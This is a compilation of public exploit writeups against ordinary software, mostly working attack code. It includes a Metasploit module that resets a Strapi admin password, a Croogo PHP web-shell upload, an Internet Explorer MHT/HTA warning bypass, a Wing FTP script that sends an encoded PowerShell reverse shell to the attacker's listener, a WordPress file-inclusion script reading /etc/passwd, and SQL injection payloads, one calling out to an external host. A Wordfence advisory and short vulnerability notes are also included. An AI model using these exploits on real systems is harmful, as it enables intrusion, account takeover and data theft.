<pre><code>##<br /># This module requires Metasploit: http://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'msf/core'<br /><br />class MetasploitModule < Msf::Auxiliary<br /> Rank = NormalRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info={})<br /> super(update_info(info,<br /><br /> 'Name' => "Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)",<br /> 'Description' => %q{<br /> This exploit module abuses the mishandling of password reset in JSON for Strapi CMS version 3.0.0-beta.17.4 to change the password of a privileged user.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [ 'WackyH4cker' ],<br /> 'References' =><br /> [<br /> [ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ]<br /> ],<br /> 'Platform' => 'linux',<br /> 'Targets' => [<br /> [ 'Strapi 3.0.0-beta-17.4', {} ]<br /> ],<br /> 'Payload' => '',<br /> 'Privileged' => true,<br /> 'DisclosureDate' => "",<br /> 'DefaultOptions' => <br /> {<br /> 'SSL' => 'False',<br /> 'RPORT' => 80,<br /> },<br /> 'DefaultTarget' => 0<br /><br /> ))<br /><br /> register_options [<br /> OptString.new('NEW_PASSWORD', [true, 'New password for user Admin'])<br /> ]<br /> end<br /><br /> def check<br /><br /> res = send_request_raw({ 'uri' => '/admin/init' })<br /> version = JSON.parse(res.body) <br /><br /> if version["data"]["strapiVersion"] == '3.0.0-beta.17.4'<br /> return Exploit::CheckCode::Vulnerable<br /> else<br /> return Exploit::CheckCode::Safe<br /> end<br /> <br /> end<br /><br /> def run<br /><br /> json_body = { 'code' => {'$gt' => 0},<br /> 'password' => datastore['NEW_PASSWORD'],<br /> 'passwordConfirmation' => datastore['NEW_PASSWORD'] }<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => '/admin/auth/reset-password',<br /> 'ctype' => 'application/json',<br /> 'data' => JSON.generate(json_body)<br /> })<br /><br /> print_status("Changing password...")<br /> json_format = JSON.parse(res.body)<br /> jwt = json_format['jwt']<br /><br /> if res.code == 200<br /> print_good("Password changed successfully!")<br /> print_good("USER: admin")<br /> print_good("PASSWORD: #{datastore['NEW_PASSWORD']}")<br /> print_good("JWT: #{jwt}")<br /> else<br /> fail_with(Failure::NoAccess"Could not change admin user password")<br /> end<br /> end<br /><br />end<br /> <br /></code></pre>
<pre><code># Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated)<br /># Date: 05/12/2021<br /># Exploit Author: Deha Berkin Bir<br /># Vendor Homepage: https://croogo.org/<br /># Software Link: https://downloads.croogo.org/v3.0.2.zip<br /># Version: 3.0.2<br /># Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3<br /><br />==> Tutorial <==<br /><br />1- Login with your privileged account.<br />2- Go to the 'Attachments' section. Directory is '/admin/file-manager/attachments'.<br />3- Click the 'New Attachment' button.<br />4- Choose a malicious php script and upload it.<br /><br />########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT ####################<br /><?php<br />$command = shell_exec('netstat -an');<br />echo "<pre>$command</pre>";<br />?><br />############################################################################<br /><br />5- Click on the URL of malicious php script you uploaded.<br />6- The malicious PHP script will be executed.<br /><br /><br />==> HTTP Request (File Upload) <==<br /><br />POST /admin/file-manager/attachments/add HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------7028631106888453201670373694<br />Content-Length: 976<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/file-manager/attachments/add<br />Cookie: csrfToken=bf693e75da3b8cfedb1e097485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb; CAKEPHP=do6gfdgwsl424dabvg1mqp9; GeniXCMS-pJSRyfdghoBRVTDlKhjklmkfhtkbup1r; PHPSESSID=gd59dfghhhg2n10amijq89hih<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------7028631106888453201670373694<br />Content-Disposition: form-data; name="_method"<br /><br />POST<br />-----------------------------7028631106888453201670373694<br />Content-Disposition: form-data; name="_csrfToken"<br /><br />bf693ebed78cee03265197aed57e994e70d7qwdfq231341234dsfasdf2397485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb<br />-----------------------------7028631106888453201670373694<br />Content-Disposition: form-data; name="file"; filename="malicious.php"<br />Content-Type: application/octet-stream<br /><br /><?php<br />$command = shell_exec('netstat -an');<br />echo "<pre>$command</pre>";<br />?><br /><br />-----------------------------7028631106888453201670373694<br />Content-Disposition: form-data; name="_Token[fields]"<br /><br />16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A<br />-----------------------------7028631106888453201670373694<br />Content-Disposition: form-data; name="_Token[unlocked]"<br /><br /><br />-----------------------------7028631106888453201670373694--<br /></code></pre>
<pre><code>On January 4, 2022, the Wordfence Threat Intelligence team began the responsible disclosure process for several Remote Code Execution vulnerabilities in PHP Everywhere, a WordPress plugin installed on over 30,000 websites. One of these vulnerabilities allowed any authenticated user of any level, even subscribers and customers, to execute code on a site with the plugin installed. As the vulnerabilities were of critical severity, we contacted the WordPress plugin repository with our disclosure in addition to initiating outreach to the plugin author.<br /><br />We received a response from the plugin author within a few hours and sent over the full disclosure at that time. A largely rebuilt version of the plugin was made available on January 10, 2022.<br /><br />What should I do if I’m running PHP Everywhere?<br /><br />If you’re using the PHP everywhere plugin, it is imperative that you upgrade to the newest version, which is 3.0.0 at the time of this writing, in order to prevent your site from being exploited. Unfortunately, version 3.0.0 only supports PHP snippets via the Block editor, so if you are using the Classic Editor you will need to uninstall the plugin and find another solution. You should not continue to run older versions of PHP Everywhere under any circumstances.<br /><br />Description: Remote Code Execution by Subscriber+ users via shortcode<br /><br />Affected Plugin: PHP Everywhere<br /><br />Plugin Slug: php-everywhere<br /><br />Plugin Developer: Alexander Fuchs<br /><br />Affected Versions: <= 2.0.3<br /><br />CVE ID: CVE-2022-24663<br /><br />CVSS Score: 9.9(Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H<br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 3.0.0<br /><br />PHP Everywhere is a WordPress plugin that is intended to allow site owners to execute PHP code anywhere on their site. It included functionality that allowed execution of PHP Code Snippets via WordPress shortcodes. Unfortunately, WordPress allows any authenticated users to execute shortcodes via the parse-media-shortcode AJAX action, and some plugins also allow unauthenticated shortcode execution. As such it was possible for any logged-in user, even a user with almost no permissions, such as a Subscriber or a Customer, to execute arbitrary PHP on a site by sending a request with the shortcode parameter set to [php_everywhere]<arbitrary PHP>[/php_everywhere]. Executing arbitrary PHP on a site typically allows complete site takeover.<br /><br />Description: Remote Code Execution by Contributor+ users via metabox<br /><br />Affected Plugin: PHP Everywhere<br /><br />Plugin Slug: php-everywhere<br /><br />Plugin Developer: Alexander Fuchs<br /><br />Affected Versions: <= 2.0.3<br /><br />CVE ID: CVE-2022-24664<br /><br />CVSS Score: 9.9(Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H<br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 3.0.0<br /><br />By default, the PHP Everywhere plugin allowed all users with the edit_posts capability to use the PHP Everywhere metabox.<br /><br />Unfortunately this meant that untrusted Contributor-level users could use the PHP Everywhere metabox to achieve code execution on a site by creating a post, adding PHP code to the PHP Everywhere metabox, and then previewing the post. While this vulnerability has the same CVSS score as the shortcode vulnerability, it is less severe, since it requires contributor-level permissions, which imply some degree of trust and are more difficult to obtain than subscriber-level permissions. This is due to the CVSS scoring system which does not allow “Medium” in the “Privileges Required” field.<br /><br />Description: Remote Code Execution by Contributor+ users via gutenberg block<br /><br />Affected Plugin: PHP Everywhere<br /><br />Plugin Slug: php-everywhere<br /><br />Plugin Developer: Alexander Fuchs<br /><br />Affected Versions: <= 2.0.3<br /><br />CVE ID: CVE-2022-24665<br /><br />CVSS Score: 9.9(Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H<br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 3.0.0<br /><br />By default, the PHP Everywhere plugin allowed all users with the edit_posts capability to use the PHP Everywhere Gutenberg block. While it was possible to set this to admin-only, this was not set by default due to versions <= 2.0.3 not being able to add capability checks without disabling the Gutenberg Block editor. We worked with the plugin author to overcome this limitation when we sent our disclosure.<br /><br />Unfortunately this meant that contributor-level users could execute arbitrary PHP code on a site by creating a post, adding the PHP everywhere block and adding code to it, and then previewing the post. As with the metabox vulnerability, this has the same CVSS score as the shortcode vulnerability but is less severe as it requires Contributor-level permissions to exploit.<br /><br />Timeline<br /><br />January 4, 2022 – We release a firewall rule available to Wordfence Premium, Wordfence Care, and Wordfence Response customers. We begin the disclosure process with the plugin author and disclose to the WordPress plugin repository. The plugin author responds and we send over full disclosure.<br /><br />January 10, 2022 – A Patched version, 3.0.0, is released.<br /><br />February 3, 2022 – The firewall rule becomes available to free Wordfence users.<br /><br />Conclusion<br /><br />In today’s article, we discussed a set of vulnerabilities in the PHP Everywhere plugin which could be used for complete site takeover.<br /><br />If you know anyone running this plugin we strongly advise forwarding this advisory to them, as these vulnerabilities are very easy to exploit and can be used to quickly and completely take over a site.<br /><br /></code></pre>
<pre><code>[+] Credits: John Page (aka hyp3rlinx) <br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec <br /> <br /><br />[Vendor]<br />www.microsoft.com<br /><br /><br />[Product]<br />Microsoft Internet Explorer (MSIE)<br />Internet Explorer is a discontinued series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.<br /><br /><br />[Vulnerability Type]<br />ActiveX Control Security Bypass<br /><br /><br />[CVE Reference]<br />N/A<br /><br /><br />[Security Issue]<br />Upon opening a specially crafted .MHT file on disk, Internet Explorer ActiveX control warnings as well as popup blocker privacy settings are not enforced.<br />This can allow the execution of ActiveX content with zero warning to an unsuspecting end user and or force them to visit arbitrary attacker controlled websites.<br /><br />By default when opening browser associated files that contain active content, MSIE restricts scripts from running without explicit user interaction and permission.<br />Instead end users are presented with a yellow warning bar on the browsers webpage, asking first if they wish to allow the running of blocked content.<br />This prevents execution of active content scripts or controls without the user first clicking the "Allow blocked content" warning bar.<br /><br />However, specially crafted MHT files residing on disk that contain an invalid header directive suppress ActiveX warnings and Popup blocker privacy settings.<br />Therefore, to bypass Internet Explorer "active content" blocking, files needs to contain an Content-Location header using an arbitrary named value E.g.<br /><br />"Content-Location: PBARBAR"<br /><br />Note, often times MHT files are set to open in IE by default and IE while discontinued it is still present on the Windows OS.<br />Tested successfully on Windows 10 latest fully patched version with default IE security settings.<br /><br />Expected result: ActiveX control security warning, prevention of code execution and blocking browser popup windows.<br />Actual result: No ActiveX control code execution blocking, security warnings or browser window popup blocking enforcement.<br /><br />[PoC Requirements]<br />MHT file must reside on disk, think targeted attack scenarios.<br /><br />[Exploit/POC]<br />Change [VICTIM] value below to a specified user for testing.<br /><br />1) Create the MHT PoC file.<br /><br />"MSIE_ActiveX_Control_Security_Bypass.mht"<br /><br />From:<br />Subject:<br />Date:<br />MIME-Version: 1.0<br />Content-Type: multipart/related; type="text/html";<br /> boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"<br />This is a multi-part message in MIME format.<br /><br /><br />--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001<br />Content-Type: text/html; charset="UTF-8"<br />Content-Location: DOOM<br /><br /><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd"><br /><html><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br /></head><br /><body><br /> <br /><br /><script><br />win=window<br />win.open("http://www.microsoft.com","","width=600,height=600")<br />var args = ['height='+1,'width='+1,].join(',')<br />setTimeout("", 3000)<br />var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv ________________________________________________________.hta', 'pop', args)<br />pop.moveTo(2000,2000)<br /></script><br /><br /><br /></body><br /></html><br /><br /><br />--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--<br /><br /><br />2) Create the PoC HTA file.<br /><br />"Sales_Report_2021.csv ________________________________________________________.hta"<br /><br /><HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /><br /><script language="VBScript"><br />Set WshShell = CreateObject("WScript.Shell")<br />WshShell.Run("calc.exe")<br /></script><br /><br /><br />3) Open the MHT file locally.<br /><br /><br />[Network Access]<br />Local<br /><br /><br />[POC/Video URL]<br />https://www.youtube.com/watch?v=UCSqFbYUvBk<br /><br /><br />[Disclosure Timeline]<br />Vendor Notification: May 13, 2019<br />MSRC : July 2, 2019<br />"We determined that a fix for this issue will be considered in a future version of this product or service.<br />At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."<br />December 5, 2021 : Public Disclosure<br /><br /><br />[+] Disclaimer<br />The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>
<pre><code># Exploit Title: Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 02/06/2022<br /># Exploit Author: notcos<br /># Credit: Credit goes to the initial discoverer of this exploit, Alex Haynes.<br /># Vendor Homepage: https://www.wftpserver.com/<br /># Software Link: https://www.wftpserver.com/download/WingFtpServer.exe<br /># Version: <=4.3.8<br /># Tested on: Windows<br /><br /># !/usr/bin/python3<br />import requests<br />import sys<br />import base64<br />import urllib.parse<br /><br /># Get command line arguments<br />if len(sys.argv) != 7:<br /> print("This exploit will invoke a nishang tcp reverse shell on the target. Start your listener before executing.")<br /> print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT> <USER> <PASSWORD>" % sys.argv[0])<br /> print("Example: %s 0.0.0.0 8000 127.0.0.1 9001 notcos coolpass" % sys.argv[0])<br /> exit(1)<br /><br />else:<br /> target = sys.argv[1]<br /> targetport = sys.argv[2]<br /> localip = sys.argv[3]<br /> localport = sys.argv[4]<br /> user = sys.argv[5]<br /> password = sys.argv[6]<br /><br /> print('''<br /> .--.<br /> / ,~a`-,<br /> \ \_.-"`<br /> ) ( __ __ .__ ____ __________ _________ ___________<br /> ,/ ."\ / \ / \|__| ____ / ___\ \______ \\\\_ ___ \ \_ _____/<br /> / ( | \ \/\/ /| | / \ / /_/ > | _// \ \/ | __)_<br /> / ) ; \ / | || | \ \___ / | | \\\\ \____ | \\<br /> / / / \__/\ / |__||___| //_____/ |____|_ / \______ //_______ /<br /> ,/_."` /` \/ \/ \/ \/ \/<br /> /_/\ |___<br /> `~~~~~`<br /> ''')<br /><br /> # Create the login request<br /> url = 'http://' + target + ':' + targetport + '/admin_loginok.html'<br /> data = ('username=' + user + '&password=' + password + '&username_val=' + user + '&password_val=' + password + '&su'<br /> 'bmit_btn=%2bLogin%2b')<br /> headers = {<br /> "User-Agent": "Googlebot"<br /> }<br /><br /> # Send the POST request to log in and save the cookie<br /> r = requests.post(url, headers=headers, data=data)<br /> cookie = 'UIDADMIN=' + r.cookies['UIDADMIN']<br /> print('Login successful - Cookie: ' + cookie)<br /> url = "http://172.31.1.20:8080/admin_lua_script.html"<br /> headers = {<br /> "User-Agent": "Googlebot",<br /> "Cookie": cookie,<br /> }<br /><br /> # Base64 encode a nishang reverse tcp shell one liner and then url encode it<br /> nish = ("$client = New-Object System.Net.Sockets.TCPClient(\"" + localip + "\"," + localport + ");$stream = $client"<br /> ".GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$d"<br /> "ata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1"<br /> " | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCI"<br /> "I).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()")<br /> encodedStr = str(base64.b64encode(nish.encode('UTF-16LE')), "UTF8")<br /> urlpayload = urllib.parse.quote(encodedStr, safe='+')<br /> finalload = "command=os.execute('powershell -Encodedcommand " + urlpayload + "')"<br /><br /> # Send the reverse shell payload<br /> try:<br /> r = requests.post(url, headers=headers, data=finalload, timeout=0.1)<br /> except requests.exceptions.ReadTimeout: <br /> print("The payload has been sent. Check your listener.")<br /> pass<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: HCL Lotus Notes V12- Unquoted Service Path<br /># Exploit Author: Mert DAŞ<br /># Version: V12<br /># Date: 01/12/2021<br /># Vendor Homepage: https://www.hcltechsw.com/domino/download<br /># Tested on: Windows 10<br /><br /><br />ProcessId : 3860<br />Name : LNSUSvc<br />DisplayName : HCL Notes Smart Upgrade Hizmeti<br />PathName : c:\HCL\Notes\SUService.exe<br />StartName : LocalSystem<br />StartMode : Auto<br />State : Running<br /><br />Discovery<br />-------------------------<br />C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert<br />their code in the system root path undetected by the OS or other security<br />applications where it could potentially be executed during application<br />startup or reboot. If successful, the local user's code would execute with<br />the elevated privileges of the application.<br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion<br /># Date: 2022-02-06<br /># Exploit Author: Ven3xy<br /># Vendor Homepage: https://wordpress.org/plugins/simple-job-board/<br /># Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip<br /># Version: 2.9.3<br /># Tested on: Ubuntu 20.04 LTS<br /># CVE : CVE-2020-35749<br /><br /><br />import requests<br />import sys<br />import time<br /><br />class color:<br /> HEADER = '\033[95m'<br /> IMPORTANT = '\33[35m'<br /> NOTICE = '\033[33m'<br /> OKBLUE = '\033[94m'<br /> OKGREEN = '\033[92m'<br /> WARNING = '\033[93m'<br /> RED = '\033[91m'<br /> END = '\033[0m'<br /> UNDERLINE = '\033[4m'<br /> LOGGING = '\33[34m'<br />color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] <br /> <br /><br />def banner():<br /> run = color_random[6]+'''\nY88b / 888~~ 888 ,e, d8 <br /> Y88b / 888-~88e 888___ Y88b / 888-~88e 888 e88~-_ " _d88__ <br /> Y88b e / 888 888b ____ 888 Y88b/ 888 888b 888 d888 i 888 888 <br /> Y88bd8b/ 888 8888 888 Y88b 888 8888 888 8888 | 888 888 <br /> Y88Y8Y 888 888P 888 /Y88b 888 888P 888 Y888 ' 888 888 <br /> Y Y 888-_88" 888___ / Y88b 888-_88" 888 "88_-~ 888 "88_/ <br /> 888 888 \n'''<br /> run2 = color_random[2]+'''\t\t\t(CVE-2020-35749)\n''' <br /> run3 = color_random[4]+'''\t{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''<br /> print(run+run2+run3) <br /> <br /> <br /><br />if (len(sys.argv) != 5):<br /> banner()<br /> print("[!] Usage : ./wp-exploit.py <target_url> <file_path> <USER> <PASS>")<br /> print("[~] Example : ./wp-exploit.py http://target.com:8080/wordpress/ /etc/passwd admin admin")<br /> exit()<br /><br />else:<br /> banner()<br /> fetch_path = sys.argv[2]<br /> print (color_random[5]+"[+] Trying to fetch the contents from "+fetch_path)<br /> time.sleep(3)<br /> target_url = sys.argv[1]<br /> usernamex = sys.argv[3]<br /> passwordx = sys.argv[4]<br /> print("\n")<br /> login = target_url+"wp-login.php"<br /> wp_path = target_url+'wp-admin/post.php?post=application_id&action=edit&sjb_file='+fetch_path<br /> username = usernamex<br /> password = passwordx<br /><br /> with requests.Session() as s:<br /> headers = { 'Cookie':'wordpress_test_cookie=WP Cookie check',<br /> 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' }<br /><br /> post_data={ 'log':username, 'pwd':password, <br /> 'wp-submit':'Log In','redirect_to':wp_path, <br /> 'testcookie':'1'<br /> } <br /> <br /> s.post(login, headers=headers, data=post_data)<br /> resp = s.get(wp_path)<br /> <br /> out_file = open("output.txt", "w")<br /> print(resp.text, file=out_file)<br /> out_file.close()<br /> print(color_random[4]+resp.text)<br /> out = color_random[5]+"\n[+] Output Saved as: output.txt\n"<br /> print(out)<br /> <br /></code></pre>
<pre><code>## [MSMS](https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html)<br /><br />## [Vendor](https://www.sourcecodester.com/users/tips23)<br /><br />![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/MSMS/docs/Screenshot%202021-12-04%20175708.png)<br /><br />## Description<br />The `password` parameter on MSMS 1.0 appears to be vulnerable to SQL<br />injection attacks. The predictive tests of this application interacted<br />with that domain, indicating that the injected SQL query was executed.<br />The attacker can retrieve all authentication and<br />information about the users of this system.<br /><br />## Payload<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=hacked' AND (SELECT 5469 FROM<br />(SELECT(SLEEP(5)))kYFm) AND 'eRWi'='eRWi&password=y3L!z9j!P2'+(select<br />load_file('\\\\525cg9hmf4ujg32elolcrk29s0yumlq9hc54svgk.nu11secur1typenetrationtestingengineer.net\\maq'))+'<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/MSMS)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/fvwqq2)<br /></code></pre>
<pre><code># Exploit Title: Hotel Reservation System 1.0 - SQLi (Unauthenticated)<br /># Google Dork: None<br /># Date: 01/29/2022<br /># Exploit Author: Nefrit ID<br /># Author Website: https://manadocoder.com<br /># Vendor Homepage: https://github.com/dhruvmullick<br /># Software Link: https://github.com/dhruvmullick/hotel-reservation-system<br /># Tested on: Kali Linux & Windows 10<br /><br />===Exploit Url===<br />http://localhost/hotel-reservation-system-master/login.php<br />Method: POST<br />Parameter: username<br />===Burpsuite Proxy Intercept===<br />POST /hotel-reservation-system-master/loginsession.php HTTP/1.1<br />Host: localhost<br />Content-Length: 46<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://localhost/hotel-reservation-system-master/login.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: uid=1<br />Connection: close<br /><br />username=u1337#' AND (SELECT 4775 FROM (SELECT(SLEEP(5)))BzJL)-- dvSZ&password=p1337&ok=Submit<br />I can also bypass login by using the following payload: ' or '1'='1'# on the parameter username<br /><br /></code></pre>
<pre><code># Product: Reprise License Manager 14.2<br /># Vendor: Reprise Software<br /># CVE ID: CVE-2021-44153<br /># Vulnerability Title: Authenticated Remote Binary Execution<br /># Severity: High<br /># Author(s): Mark Staal Steenberg, Bilal El Ghoul, Gionathan Armando Reale, Andreas Fyhn Andersen, Oliver Lind Nordestgaard <br /># Date: 2021-11-25<br />#############################################################<br /><br />Introduction:<br /><br />When editing the license file, it is possible for an admin user to enable an option to run arbitrary executables.<br />An attacker can exploit this to run a malicious binary on startup, or when triggering the "Reread/Restart Servers" function on the webserver. (Exploitation does not require CVE-2018-15573, because the license file is meant to be changed in the application.)<br /><br />Vulnerability:<br /><br />A license file containing the following, would execute calc.exe as an example of this vulnerability, it is also possible to provide arguments to the executables:<br /><br />ISV demo "C:\Windows\System32\calc.exe"<br /><br />If CVE-2018-15573 remains unpatched, files could be created on the system and then executed. <br /><br />Recommendation:<br />Don't allow user-specified binaries to be run. Use a allow-list if absolutely required.<br /><br /></code></pre>